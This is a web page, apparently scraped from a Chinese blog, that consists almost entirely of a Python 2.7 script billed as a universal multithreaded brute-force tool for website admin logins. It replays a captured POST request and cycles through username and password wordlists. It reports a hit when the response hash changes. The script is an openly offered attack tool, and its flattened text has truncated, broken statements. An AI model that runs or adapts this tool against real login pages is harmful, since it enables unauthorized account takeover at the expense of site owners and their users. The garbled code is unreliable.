
来源:互联网 发布:企业局域网监控软件 编辑:程序博客网 时间:2024/06/05 02:26
#! /usr/bin/env python2.7#coding=utf-8#通用后台账号密码多线程爆破必杀器import reimport osimport sysimport gzipimport Queueimport getoptimport msvcrtimport urllibimport httplibimport hashlibimport urllib2import StringIOimport threadingclass hackcrack(threading.Thread):    def __init__(self,ooldmd5,uuu,ppp):        threading.Thread.__init__(self)        self.ooldmd5 = ooldmd5        self.uuu = uuu        self.ppp = ppp    def run(self):        while 1:            if queue.empty() == True:                break            self.crack(self.ooldmd5,self.uuu,self.ppp)    def crack(self,ooldmd5,uuu,ppp):        data = queue.get()        pathes = path()        headerses = headers()        arg = host()        m = re.compile('%s=(.*?)&' % uuu)        n = re.compile('%s=(.*?)&' % ppp)             us = m.findall(data)        pw = n.findall(data)           conn = httplib.HTTPConnection(arg)        try:            conn.request('POST',pathes,data,headerses)            httpres = conn.getresponse()                        if ('content-encoding', 'gzip') in httpres.getheaders():                compressedstream = StringIO.StringIO(                  gzipper = gzip.GzipFile(fileobj=compressedstream)                     ccode =            else:                ccode =            if ccode:                newmd5 = hashlib.md5(ccode).hexdigest()            else:                newmd5 = hashlib.md5('mdbhack').hexdigest()            if ooldmd5 != newmd5:                print '\n<info> http://%s' % arg                print '<info> http://%s%s' % (arg,pathes)                print '<info> I Find It -------->username:%s password:%s<--------' % (us[0],pw[0])                print ccode                os._exit(1)            else:                print '[%s] hacking -------->username:%s password:%s' % (queue.qsize(),us[0],pw[0])                #print ccode        except:            pass        class ThreadGetKey(threading.Thread):    def run(self):        try:                       chr = msvcrt.getch()            if chr == 'q':                print "stopped by your action ( q )"                os._exit(1)        except:            os._exit(1)def info():    print '''     ,--^----------,--------,-----,-------^--,     | |||||||||   `--------'     |          O ..     `+---------------------------^----------|       `\_,-------, ___@ mdbhack#QQ.com______|         / XXXXXX /`|     /        / XXXXXX /  `\   /       / XXXXXX /\______(      / XXXXXX /             / XXXXXX /    (________(    For example:     `------' -u username -p password        '''def path():    f = open('headers.txt','r')    for p in f:        if 'POST' in p:            path = p.split(' ')[1].strip()            #print path            return pathdef headers():    headers = {}    hheader = ['Host','User-Agent','Accept','Accept-Language','Accept-Encoding','Referer','Cookie','Connection','Content-Type']    f = open('headers.txt','r')    for p in f:        for hh in hheader:            if hh in p:                headers[hh] = p.split(':',1)[1].strip()        return headersdef host():    f = open('headers.txt','r')    for p in f:        if 'Host' in p:            arg = p.split(':')[1].strip()    #print arg    return argdef testcrack(username,password):    pathes = path()    arg = host()    headerses = headers()        getusername = username    getpassword = password    f = open('headers.txt','r')    for xxx in f:        if '&' in xxx and '=' in xxx:            getdata = xxx.strip()      getpw = re.compile('%s=(.*?)&' % password)    getusern = re.compile('%s=(.*?)&' % username)        bb = getpw.sub('%s=%s&' % (password,'mdbhackcom'),getdata)    data = getusern.sub('%s=%s&' % (username,'mdbhack'),bb)    conn = httplib.HTTPConnection(arg)    conn.request('POST',pathes,data,headerses)    httpres = conn.getresponse()    if ('content-encoding', 'gzip') in httpres.getheaders():        compressedstream = StringIO.StringIO(          gzipper = gzip.GzipFile(fileobj=compressedstream)             code =    else:        code =    if code:        oldmd5 = hashlib.md5(code).hexdigest()    else:        oldmd5 = hashlib.md5('mdbhack').hexdigest()        return oldmd5    def crack(username,password):    global queue,ooldmd5    threads = []    line = 5    queue = Queue.Queue()    pathes = path()    arg = host()    ooldmd5 = testcrack(username,password)    headerses = headers()    f = open('headers.txt','r')    for xxx in f:        if '&' in xxx and '=' in xxx:            getdata = xxx.strip()    for us in open('username.txt','r'):        print '<info> Scan Username is %s ' % us.strip()        for pw in open('password.txt','r'):            getpw = re.compile('%s=(.*?)&' % password)            getusern = re.compile('%s=(.*?)&' % username)            bb = getpw.sub('%s=%s&' % (password.strip(),urllib2.quote(pw.strip())),getdata)            data = getusern.sub('%s=%s&' % (username,urllib2.quote(us.strip())),bb)            queue.put(data)        shouhu = ThreadGetKey()        shouhu.setDaemon(True)        shouhu.start()                for x in range(line):            y = hackcrack(ooldmd5,username,password)            y.start()            threads.append(y)        for x in threads:            x.join()                    if __name__ == '__main__':    if len(sys.argv) == 5:        f = open('headers.txt','r')        for xxx in f:            if '&' in xxx and '=' in xxx:                getdata = xxx.strip()                try:            opts, args = getopt.getopt (sys.argv[1:], "u:p:")#Assigning Parameters        except:            info()            sys.exit(1)        for opt,arg in opts:#Traversal            if opt == '-u':                if arg.strip() in getdata:                    username = arg.strip()                else:                    print '\nusername table %s is Wrong' % arg.strip()                    username = ''            elif opt == '-p':                if arg.strip() in getdata:                    password = arg.strip()                else:                    print 'password table %s is Wrong' % arg.strip()                    password = ''            else:                info()                sys.exit(1)        if username and password:            crack(username,password)        else:            sys.exit(1)            else:        info()        sys.exit(1)
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